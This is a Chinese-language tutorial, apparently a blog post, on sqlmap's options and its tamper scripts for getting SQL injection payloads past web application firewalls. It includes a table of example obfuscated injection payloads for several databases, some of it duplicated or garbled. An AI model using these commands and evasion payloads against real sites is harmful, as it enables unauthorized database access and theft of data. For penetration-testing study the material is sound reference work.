SQLMAP自注入--INJECTION TECGBUQUES FINGERPRINT

-p参数

指定扫描的参数 ，使--level失效

-p“user-agent,refer”这些参数也可以通过-p来指定

sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" -p "username,user-agent" --dbs

这里我们指定是对 参数 “username,user-agent”的扫描 虽然这里level没有指向到3 但是由于我们指定了 user-agent所以他还是回去扫描

--skip="id,user-agent" --level=5

这是一个排除指定扫描参数 除了skip值里面的参数 其他全部都扫描

sqlmap -u "畸形url值*”

这是一个变量的值 跟在/后面 所以 手动找出变量后 变量后面加*

--dbms 尝试每一种数据库

可以指定参数  --dbms="mysql"

--os（指定操作系统）

Linux 和windows

--invalid-bignum / --invalid-logical

通常sqlmap使用负值使参数失效 id=->id=-

bignum使用大数使参数失效id=

Logical使用布尔判断使取值失效

--no-cast
可以关掉 榨取数据

--no-escape

出于混淆和避免出错的目的，paload中用单引号定字符串，sqlmap使用char（）编码逃逸

select 'foo' --> select CHAR(102)+CHAR(111)+CHAR(111)

本参数是关闭此功能

--prefix/ --suffix

前缀和后缀

--prefix""这里我们插入的是’）一个单引号和括号 闭合ID的前缀

--suffix “”这里我们插入的事AND(’abc'='abc 用来是语句为真 并且闭合后面的括号

拼接后的语句在上图的最后一行

--tamper（经常使用 的脚本绕过 ）

混淆脚本 ，用于绕过应用层过滤/ips

      apostrophemask.py     用utf8代替引号     ("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
     base64encode.py      用base64编码替换     ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
     multiplespaces.py     围绕SQL关键字添加多个空格     ('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'
     space2plus.py     用+替换空格     ('SELECT id FROM users')
'SELECT+id+FROM+users'
     nonrecursivereplacement.py     双重查询语句。取代predefined SQL关键字with表示
suitable for替代（例如  .replace（“SELECT”、”")） filters     ('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
     space2randomblank.py     代替空格字符（“”）从一个随机的空
白字符可选字符的有效集     ('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
     unionalltounion.py     替换UNION ALL SELECT UNION SELECT     ('-1 UNION ALL SELECT')
'-1 UNION SELECT'
     securesphere.py     追加特制的字符串     ('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
mssql          space2hash.py     绕过过滤‘=’ 替换空格字符（”），（’ – ‘）后跟一个破折号注释，一个随机字符串和一个新行（’ n’）
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
     equaltolike.py     like 代替等号
* Input: SELECT * FROM users WHERE id=
 * Output: SELECT * FROM users WHERE id LIKE
     space2mssqlblank.py(mssql)     空格替换为其它空符号     Input: SELECT id FROM users
Output: SELECT%08id%02FROM%0Fusers
     space2mssqlhash.py     替换空格     ('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
     between.py     用between替换大于号（>）     ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
     percentage.py     asp允许每个字符前面添加一个%号     * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
     sp_password.py     追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾     ('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
     charencode.py     url编码     * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
     randomcase.py     随机大小写     * Input: INSERT
* Output: InsERt
     charunicodeencode.py     字符串 unicode 编码     * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
     space2comment.py     Replaces space character (‘ ‘) with comments ‘/**/’     * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
mysql >= 5.1.          equaltolike.py     like 代替等号
* Input: SELECT * FROM users WHERE id=
 * Output: SELECT * FROM users WHERE id LIKE
     greatest.py     绕过过滤’>’ ,用GREATEST替换大于号。     ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
     apostrophenullencode.py     绕过过滤双引号，替换字符和双引号。     tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'
     ifnull2ifisnull.py     绕过对 IFNULL 过滤。
替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’     ('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
     space2mssqlhash.py     替换空格     ('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
     modsecurityversioned.py     过滤空格，包含完整的查询版本注释     ('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
     space2mysqlblank.py     空格替换其它空白符号(mysql)     Input: SELECT id FROM users
Output: SELECT%0Bid%0BFROM%A0users
     between.py     用between替换大于号（>）     ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
     modsecurityzeroversioned.py     包含了完整的查询与零版本注释     ('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
     space2mysqldash.py     替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）     ('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
     bluecoat.py     代替空格字符后与一个有效的随机空白字符的SQL语句。
然后替换=为like     ('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
     percentage.py     asp允许每个字符前面添加一个%号     * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
     charencode.py     url编码     * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
     randomcase.py     随机大小写     * Input: INSERT
* Output: InsERt
     versionedkeywords.py     Encloses each non-function keyword with versioned MySQL comment     * Input:  UNION ALL SELECT NULL, NULL, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,))#
* Output: /*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR()),CHAR(,,,,))#
     space2comment.py     Replaces space character (‘ ‘) with comments ‘/**/’     * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
     charunicodeencode.py     字符串 unicode 编码     * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
     versionedmorekeywords.py     注释绕过     * Input:  UNION ALL SELECT NULL, NULL, CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,))#
* Output: /*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(,,,,),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/()),/*!CHAR*/(,,,,))#
MySQL < 5.1          halfversionedmorekeywords.py     关键字前加注释     * Input: value’ UNION ALL SELECT CONCAT(CHAR(,,,,),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR()),CHAR(,,,,)), NULL, NULL# AND ‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
20     halfversionedmorekeywords.py     当数据库为mysql时绕过防火墙，每个关键字之前添加
mysql版本评论     1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
MySQL >= 5.1.13     21     space2morehash.py     空格替换为 #号 以及更多随机字符串 换行符     * Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
 Oracle     1     greatest.py     绕过过滤’>’ ,用GREATEST替换大于号。     ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
2     apostrophenullencode.py     绕过过滤双引号，替换字符和双引号。     tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'
3     between.py     用between替换大于号（>）     ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
4     charencode.py     url编码     * Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
5     randomcase.py     随机大小写     * Input: INSERT
* Output: InsERt
6     charunicodeencode.py     字符串 unicode 编码     * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
7     space2comment.py     Replaces space character (‘ ‘) with comments ‘/**/’     * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
 PostgreSQL          greatest.py     绕过过滤’>’ ,用GREATEST替换大于号。     ('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
     apostrophenullencode.py     绕过过滤双引号，替换字符和双引号。     tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'
     between.py     用between替换大于号（>）     ('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
     percentage.py     asp允许每个字符前面添加一个%号     * Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
     charencode.py     url编码     * Input: SELECT FIELD FROM%20TABLE
* Output: %%%4c%%%%%%%%4c%%%%%4f%4d%%%%%4c%
     randomcase.py     随机大小写     * Input: INSERT
* Output: InsERt
     charunicodeencode.py     字符串 unicode 编码     * Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
     space2comment.py     Replaces space character (‘ ‘) with comments ‘/**/’     * Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users
Access          appendnullbyte.py     在有效负荷结束位置加载零字节字符编码     ('1 AND 1=1')
'1 AND 1=1%00'
其他           chardoubleencode.py     双url编码(不处理以编码的)     * Input: SELECT FIELD FROM%20TABLE
* Output: %%%254c%%%%%%%%254c%%%%%254f%254d%%%%%254c%
      unmagicquotes.py     宽字符绕过 GPC  addslashes     * Input: ′ AND =
* Output: %bf% AND =–%20

多个一起使用的方法
sqlmap.py -u“1.1.1.1” --tamper "1.py,2.py,3.py" -v 3 --dbs他会按顺序使用这些脚本

• 使用sqlmap中tamper脚本绕过waf

  11-03 7331

• STL文件序列化读取

  03-11 7571

 

• VulnHub渗透实战Billu_b0x

  06-06 1571

• js获取浏览器信息和客户端硬件信息（一）

  09-18 10931

• 用C语言实现有限状态机--读《C专家编程》

  01-09 25979

• sqlmap 绕过防火墙的tamper脚本大全

  07-02 280

• Sqlmap Tamper大全

  08-10 2898

• sqlmap注入之tamper绕过WAF防火墙过滤

  05-19 8508

• sqlmap tamper 细读

  09-13 1407

• SNMP协议详解<二>

  10-29 150339

• Java WEB 分页实现

  04-16 29753

 

• 连续特征离散化和归一化

  06-25 52357

• 【Unity3D Shader编程】之二 雪山飞狐篇：Unity的基本Shader...

  11-09 81087

• SQLMAP tamper WAF 绕过脚本列表注释

  11-22 1785

• sqlmap过waf脚本及目录介绍

  04-26 3010

• sqlmap 绕过防火墙的tamper脚本

  07-12 2207

• sqlmap 的源码学习笔记二之编写tamper脚本

  08-21 3693

• sqlmap中tamper脚本绕过waf、防火墙获得数据库信息

  06-19 250

• sqlmap的tamper问题

  05-24 599

• SQLMAP自带的绕过脚本 --tamper详解

  03-04 42

• SQLMAP渗透笔记之绕过WAF防火墙

  12-26 4945

• 【渗透实战】sqlmap_修改tamper脚本_绕过WAF并制作通杀0day

  02-14 685

• WAF绕过的各种姿势

  10-23 434

• 使用sqlmap 绕过防火墙进行注入测试

  04-20 28117

• 【SQL注入/WAF】使用sqlmap 绕过防火墙进行注入测试

  04-15 694

• sqlmap tamper绕过WAF

  01-07 868

• SQLmap简介以及防火墙绕过方法

  09-23 1220

• WAF自动化暴破（绕过）脚本xwaf

  02-23 1385

• Sqlmap 使用tamper脚本绕过waf （一）

  07-16 1033

• 深入理解SQL注入绕过WAF和过滤机制

  03-13 7422

转

sqlmap --tamper 绕过WAF脚本分类整理

2017年01月29日 21:57:18 whatday 阅读数：20629 标签： sqlmap

 

每当注入的时候看到这个贱贱的提示框，内心有千万只草泥马在奔腾。

但很多时候还是得静下来分析过滤系统到底过滤了哪些参数，该如何绕过。

sqlmap中的tamper给我们带来了很多防过滤的脚本，非常实用，可能有的朋友还不知道怎样才能最有效的利用tamper脚本。

当然使用脚本之前需要确定的就是系统过滤了哪些关键字，比如单引号、空格、select、union、admin等等。

所以有的时候我们会发现，注入成功了但是dump不出数据，很可能是select被过滤了等等原因。

如何判断使用哪个脚本

最简单的办法就是在url参数中手工带入关键词，判断是否被过滤。

如图：

直接加个单引号被过滤，说明注入时单引号是没法用的。

空格、等于号都没有过滤，成功报错。

select被过滤。

以此类推，当sqlmap注入出现问题时，比如不出数据，就要检查对应的关键词是否被过滤。

比如空格被过滤可以使用space2comment.py，过滤系统对大小写敏感可以使用randomcase.py等等。

下面对于sqlmap的tamper参数详细讲解。

使用方法

根据实际情况，可以同时使用多个脚本，使用-v参数可以看到payload的变化。

sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2comment,versionedmorekeywords.py"  -v 3 --dbs